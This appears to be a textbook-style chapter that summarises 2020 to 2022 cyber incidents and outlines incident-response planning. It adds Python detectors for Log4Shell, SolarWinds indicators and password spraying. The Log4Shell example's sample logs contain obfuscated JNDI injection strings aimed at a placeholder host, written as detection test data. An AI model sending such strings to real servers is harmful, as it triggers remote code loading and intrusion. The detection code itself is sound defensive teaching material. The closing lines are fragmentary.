Microsoft Exchange Server hack (2021)
Description: Four zero-day vulnerabilities in Microsoft Exchange Server were exploited to gain access to email accounts. The attackers deployed web shells to maintain persistent access to, and control over, the compromised servers.
Impact: At least 30,000 organisations in the United States and potentially hundreds of thousands worldwide were affected, including businesses, local governments and educational institutions.
Attribution: Microsoft attributed the attack to Hafnium, a group believed to operate from China with state sponsorship, indicating a high level of resources and co-ordination.
Colonial Pipeline ransomware attack (2021)
Description: The DarkSide ransomware gang used compromised login credentials to access Colonial Pipeline's network. The ransomware encrypted data and a ransom was demanded for the decryption keys.
Impact: The pipeline, responsible for transporting 45 per cent of the US east coast's fuel, shut down for several days, leading to fuel shortages, panic buying and price spikes. Colonial Pipeline paid a US$4.4 million ransom, although a portion was later recovered by the FBI.
Attribution: DarkSide is a cybercriminal group believed to operate out of Eastern Europe, possibly Russia. The group's tactics and focus on financial gain are characteristic of organised cybercrime.
JBS Foods ransomware attack (2021)
Description: JBS USA, part of the world's largest meat processing company, suffered a ransomware attack that encrypted files and disrupted operations in North America and Australia.
Impact: The attack led to a temporary shutdown of JBS facilities, causing significant disruption in the meat supply chain. JBS paid US$11 million in ransom to REvil to regain access to its systems.
Attribution: REvil (also known as Sodinokibi), a notorious ransomware group with ties to Russia, claimed responsibility. The attack demonstrated the vulnerability of critical food supply infrastructure.
Kaseya VSA ransomware attack (2021)
Description: REvil exploited vulnerabilities in Kaseya's VSA software, a remote monitoring and management product used by managed service providers (MSPs). This allowed the ransomware to be pushed out to the MSPs' customers, leading to widespread impact.
Impact: Up to 1,500 organisations were affected, with systems encrypted and ransom payments demanded. The attack highlighted the supply chain risk of IT management software that holds privileged access to many customer environments.
Attribution: REvil, consistent with its previous attacks, demanded significant ransoms and caused extensive disruption, leveraging the interconnected nature of MSPs and their clients.
Facebook data breach (2021)
Description: Personal data of more than 533 million Facebook users from 106 countries was leaked online. The data included phone numbers, Facebook IDs, full names, locations, birthdates, bios and, in some cases, email addresses.
Impact: Although the data was scraped in 2019, it resurfaced in 2021 and became readily available on hacking forums. This raised significant privacy concerns and increased the risk of identity theft and targeted phishing.
Attribution: The leak resulted from a weakness in Facebook's 'Add Friend' feature, which allowed automated scraping of user profiles. While specific attackers were not identified, the incident underscores the risks of large-scale data scraping.
T-Mobile data breach (2021)
Description: Hackers gained access to T-Mobile's systems, stealing personal data of more than 40 million current and prospective customers. The breach included sensitive information such as names, dates of birth, Social Security numbers and driving licence details.
Impact: The breach exposed a significant volume of sensitive personal information, potentially leading to identity theft and fraud. T-Mobile faced criticism over its security practices and its response to the breach.
Attribution: A hacker claimed responsibility and offered the data for sale on a dark web forum. The breach highlighted weaknesses in T-Mobile's data security controls.
Log4j vulnerability exploitation (2021 to 2022)
Description: The Log4j logging library, widely used in Java applications, had a critical vulnerability (CVE-2021-44228) that allowed unauthenticated remote code execution. Because vulnerable versions of Log4j 2 resolved JNDI lookups embedded in logged strings, an attacker could exploit the flaw simply by sending a request containing a crafted string (for example in an HTTP header) that the application then logged. Fixes were released in a series of Log4j versions starting with 2.15.0.
Impact: The vulnerability, known as Log4Shell, had a vast impact due to the widespread use of Log4j. It affected a large number of applications and services, and exploitation attempts were reported globally within hours of disclosure. Organisations scrambled to identify vulnerable software, patch it and mitigate the risk.
Attribution: While the vulnerability itself was a flaw in the software, various threat actors, including state-sponsored groups and cybercriminals, quickly moved to exploit it. The speed and breadth of exploitation underscored the critical nature of the vulnerability.
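The following detection routine is an added example, not part of the original text or of the Log4j project. It shows how a log review for Log4Shell has to undo the common obfuscations (case-changing lookups such as `${lower:j}` and default-value lookups such as `${::-j}` or `${env:X:-j}`) before looking for the `${jndi:...}` token, and why a benign lookup such as `${date:yyyy}` should not be flagged. The log lines are constructed for the example and the IP addresses are documentation ranges.

```python
import re

# Constructed Apache-style access log lines (not real traffic). The quoted
# User-Agent field is a common injection point because many applications log it
# verbatim.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:01:05 +0000] "GET /login HTTP/1.1" 200 2048 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:01:06 +0000] "GET /login HTTP/1.1" 200 2048 "-" '
    '"${${lower:j}${upper:n}di:${::-r}mi://198.51.100.7:1099/x}"',
    '10.0.0.9 - - [10/Dec/2021:14:01:07 +0000] "GET /api HTTP/1.1" 404 128 "-" '
    '"${${env:NOPE:-j}ndi:dns://198.51.100.7/t}"',
    # Benign Log4j-style lookup in a query string: must not be reported.
    '10.0.0.12 - - [10/Dec/2021:14:02:00 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 900 "-" "curl/7.68.0"',
]

# ${lower:X} / ${upper:X}: the inner text is what matters, so keep only X.
# (Case is irrelevant because the final jndi match is case-insensitive.)
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^}]*)\}", re.IGNORECASE)
# ${name:-X}, ${::-X}, ${env:FOO:-X}: the default value X is what gets emitted.
# Each repetition must consume a ':' so the pattern cannot backtrack explosively.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}:]*:(?:[^{}:]*:)*-([^}]*)\}")
# The payload we are actually looking for, with the protocols JNDI can reach.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:", re.IGNORECASE)


def normalise(s: str) -> str:
    """Collapse case-changing and default-value lookups until nothing changes,
    so a disguised payload rejoins into plain text such as ${jndi:rmi://...}."""
    prev = None
    while prev != s:
        prev = s
        s = _CASE_LOOKUP.sub(r"\1", s)
        s = _DEFAULT_LOOKUP.sub(r"\1", s)
    return s


def find_log4shell(lines):
    """Return (line_number, protocol, normalised_line) for each line that carries
    a JNDI lookup after de-obfuscation."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalise(line)
        m = _JNDI.search(norm)
        if m:
            hits.append((n, m.group(1).lower(), norm))
    return hits


if __name__ == "__main__":
    for n, proto, norm in find_log4shell(SAMPLE_LOG):
        print(f"line {n}: jndi/{proto} -> {norm}")
```

Treat a hit as evidence of an exploitation attempt, not of a successful compromise: whether the server was vulnerable, and whether it made the outbound LDAP, RMI or DNS connection, has to be checked separately on the host and in egress logs.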
Crypto.com hack (2022)
Description: Hackers bypassed Crypto.com's two-factor authentication system, stealing approximately US$34 million in Bitcoin and Ethereum from user accounts.
Impact: Around 500 user accounts were affected, leading to significant financial losses. Crypto.com reimbursed affected users and implemented additional security measures.
Attribution: Specific attackers were not publicly identified. The breach highlighted weaknesses in cryptocurrency exchange security, particularly around MFA systems.
Okta security breach (2022)
Description: Hackers gained access to Okta's internal systems through a third-party contractor, potentially compromising thousands of Okta customers who rely on the company's authentication services.
Impact: The breach raised concerns about the security of the IAM services provided by Okta, affecting the trust and security posture of its customers.
Attribution: The Lapsus$ group claimed responsibility for the breach. Lapsus$ is known for targeting large tech companies and exploiting weaknesses in third-party services to gain access.
INCIDENT RESPONSE (IR)
IR describes the process an organisation uses in response to an incident. It is a structured approach to handling and managing the aftermath of an incident in order to reduce damage, recovery time and cost. The incident can be anything from a power outage, severe weather or fire to a data breach or cyber-attack. Each incident needs to be managed effectively to reduce the impact and harm to the organisation. With the ever greater reliance on information processes and systems, the financial and reputational damage if these are disrupted can be huge.
SolarWinds incident in December 2020.
This incident impacted five of the seven African local markets I was supporting, cybersecurity-wise, for a global company. They were not attacked directly, but had software that required patching quickly due to a vulnerability, as well as a check for any IoCs. My role was to ensure systems were patched and a check for IoCs was performed, working with stakeholders at local and senior levels. What was also interesting was that, as soon as the vulnerability became known, there was a huge increase in external scans looking for it.
The SolarWinds attack was a sophisticated supply chain cyber operation, conducted by APT29, also known as Cozy Bear, and attributed to Russia's Foreign Intelligence Service. The compromise was discovered in December 2020. Cozy Bear had created customised malware and injected it into the SolarWinds Orion software build process, so that it was distributed through the normal, signed software update process without customers knowing that the update contained malware. As well as the malware, they used token theft, password spraying, spear phishing and API abuse, along with other supply chain attacks, to compromise user accounts and gain access. The US government assessed that, of the approximately 18,000 public and private sector customers who installed the affected Orion update, only a very small number saw follow-on activity from Cozy Bear on their systems.
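An IoC check of the kind described above, written here as an added example rather than as anything from the original text or from SolarWinds or the investigating agencies. Because the trojanised update was signed by the vendor, checking the digital signature would have passed; the practical check is to compare file hashes and DNS queries against published indicators. The hash, domain, file names and DNS log lines below are constructed placeholders, not the real indicators, and the sample install directory is created in a temporary folder so the script runs offline.

```python
import hashlib
import os
import tempfile

# Constructed indicators for the exercise (placeholders, NOT the published
# SolarWinds IoCs): the SHA-256 of a constructed file body and a constructed
# command-and-control domain. Any subdomain of the domain also counts as a hit.
TROJANISED_BODY = b"constructed trojanised plugin body -- not a real sample"
IOC_SHA256 = {hashlib.sha256(TROJANISED_BODY).hexdigest()}
IOC_DOMAINS = {"update-cdn.example.net"}

# Constructed DNS resolver log: timestamp, client host, query name, record type.
SAMPLE_DNS_LOG = [
    "2020-12-14T10:00:01Z host01 www.example.com A",
    "2020-12-14T10:00:07Z host02 7g3k9q2m.update-cdn.example.net A",   # subdomain: hit
    "2020-12-14T10:00:09Z host03 updatecdn.example.net A",             # look-alike: not a hit
    "2020-12-14T10:01:30Z host02 update-cdn.example.net CNAME",        # exact: hit
]


def sha256_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large binaries need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()


def sweep_files(root: str):
    """Return the relative paths under root whose SHA-256 is on the IoC list."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if sha256_file(path) in IOC_SHA256:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def domain_hits(lines):
    """Return (line_number, query_name) for queries to an IoC domain or a subdomain of one."""
    hits = []
    for n, line in enumerate(lines, 1):
        qname = line.split()[2].lower().rstrip(".")
        if any(qname == d or qname.endswith("." + d) for d in IOC_DOMAINS):
            hits.append((n, qname))
    return hits


def build_sample_tree() -> str:
    """Create a constructed install directory holding one clean and one trojanised file."""
    root = tempfile.mkdtemp(prefix="orion-sample-")
    os.makedirs(os.path.join(root, "plugins"))
    with open(os.path.join(root, "plugins", "clean.dll"), "wb") as f:
        f.write(b"constructed clean plugin body")
    with open(os.path.join(root, "plugins", "suspect.dll"), "wb") as f:
        f.write(TROJANISED_BODY)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    print("file IoC hits:", sweep_files(sample_root))
    print("DNS IoC hits:", domain_hits(SAMPLE_DNS_LOG))
```

In a real sweep the indicator sets are loaded from the vendor or CERT advisory rather than hard-coded, and the DNS check is run over resolver logs covering the whole period the affected update was installed, not just the day of discovery.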
The NIST SP 800-61 definition of an incident is: 'A security incident is the act of violating an explicit or implied security policy.'
An organisation should have an IR plan in place which clearly defines what an incident is, with a guided process to follow in order to ascertain the severity of the incident and the required response.
The need for effective IR and incident management is often driven by change. Some of the trends and increasingly common occurrences that can prompt such change are:
a rise in information security incidents and losses such as ransomware;
vulnerabilities in hardware and software;
control failure;
legal and regulatory changes;
lack of security, with poorly managed IT;
threat actor capability growing.
An IR plan must be supported by policy and procedure. The first step in building an IR plan is to revisit the organisation's other information security policies to ensure they are up to date and fit for purpose, so that the plan is built on solid foundations.
A typical IR plan may include the following:
mission;
strategies and goals;
the organisation's approach to IR;
triage, and the triggers for the different IR levels;
key decision-makers and their responsibilities;
communication with the rest of the organisation and with third parties or customers;
an ability to measure the IR capability and its effectiveness;
lessons learnt, for ongoing improvement of the IR capability;
senior management approval.
The preparation phase is perhaps the most important. Here the IR plan is developed and what is often called a computer emergency response team (CERT) is put together and trained. The goal is to ensure the organisation has the people, tools, policies and plans to respond to an incident. The plan cannot be considered implemented until it has been tested.
The next phase is the detection of an incident; it could be just an IoC, an intrusion or a full-blown cyber-attack. The sooner you can detect, the sooner you can respond. A very important part of this phase is to confirm that it is a genuine incident and not a false positive caused by a system failure or a mis-tuned alert. It is here that having monitoring, vulnerability scanning, intrusion detection systems (IDSs) and log and network traffic analysis in place helps to give quick visibility and therefore a quick response. Alongside detection you need the ability to undertake further analysis to determine the required response.
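The distinction between a real incident and a noisy false positive is easiest to see with an example. The script below is added here (it is not from the original text) and looks for password spraying, one of the techniques attributed to the SolarWinds actor above, in authentication logs: one source failing against many different accounts in a short window. It deliberately does not flag a single user who fails repeatedly from one address, which is a lockout or brute-force signal and is usually just a forgotten password. The log lines and IP addresses are constructed for the example, and the field layout (timestamp, result, user, source) is an assumption rather than any particular product's format.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed authentication events (not real logs): timestamp, result, user, source IP.
SAMPLE_AUTH_LOG = [
    "2021-03-02T09:00:01Z FAIL alice 203.0.113.10",
    "2021-03-02T09:00:04Z FAIL bob 203.0.113.10",
    "2021-03-02T09:00:09Z FAIL carol 203.0.113.10",
    "2021-03-02T09:00:13Z FAIL dave 203.0.113.10",
    "2021-03-02T09:00:18Z FAIL erin 203.0.113.10",
    "2021-03-02T09:00:22Z FAIL frank 203.0.113.10",
    "2021-03-02T09:00:40Z OK frank 203.0.113.10",      # the spray found a working password
    # One user mistyping a password five times, then getting in: noisy, but not a spray.
    "2021-03-02T09:10:00Z FAIL carol 198.51.100.4",
    "2021-03-02T09:10:06Z FAIL carol 198.51.100.4",
    "2021-03-02T09:10:12Z FAIL carol 198.51.100.4",
    "2021-03-02T09:10:20Z FAIL carol 198.51.100.4",
    "2021-03-02T09:10:31Z FAIL carol 198.51.100.4",
    "2021-03-02T09:10:45Z OK carol 198.51.100.4",
]


def parse_event(line):
    """Split one constructed log line into (timestamp, result, user, source_ip)."""
    ts, result, user, ip = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), result, user, ip


def detect_password_spray(lines, window=timedelta(minutes=10), min_users=5):
    """Flag source IPs that fail against at least min_users distinct accounts
    within `window`. Repeated failures for a single account are not a spray and
    are not reported here; they belong to a separate lockout or brute-force rule."""
    by_ip = defaultdict(list)
    for ts, result, user, ip in map(parse_event, lines):
        by_ip[ip].append((ts, result, user))

    findings = []
    for ip, events in by_ip.items():
        events.sort()
        fails = [(ts, user) for ts, res, user in events if res == "FAIL"]
        best_users, window_start = set(), None
        # Slide the window from each failure and keep the densest set of distinct users.
        for start, _ in fails:
            users = {u for t, u in fails if start <= t <= start + window}
            if len(users) > len(best_users):
                best_users, window_start = users, start
        if len(best_users) >= min_users:
            # Successes from the same source after the spray began mark the accounts to reset first.
            compromised = sorted({u for t, res, u in events if res == "OK" and t >= window_start})
            findings.append({
                "source": ip,
                "distinct_users": len(best_users),
                "window_start": window_start.isoformat(),
                "compromised": compromised,
            })
    return findings


if __name__ == "__main__":
    for finding in detect_password_spray(SAMPLE_AUTH_LOG):
        print(finding)
```

The thresholds (five users in ten minutes) are tuning parameters: set them from the organisation's own baseline, and remember that a patient attacker can spread a spray across many source addresses and a longer window, so a per-source rule is a floor, not a ceiling.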
Monitoring: Ongoing monitoring to detect any signs of residual issues or new attacks.
Table 8.1 Basic prioritisation of incidents by severity of attacks (ENISA)
Organisations must understand their responsibility for notification of a breach following local law and regulation.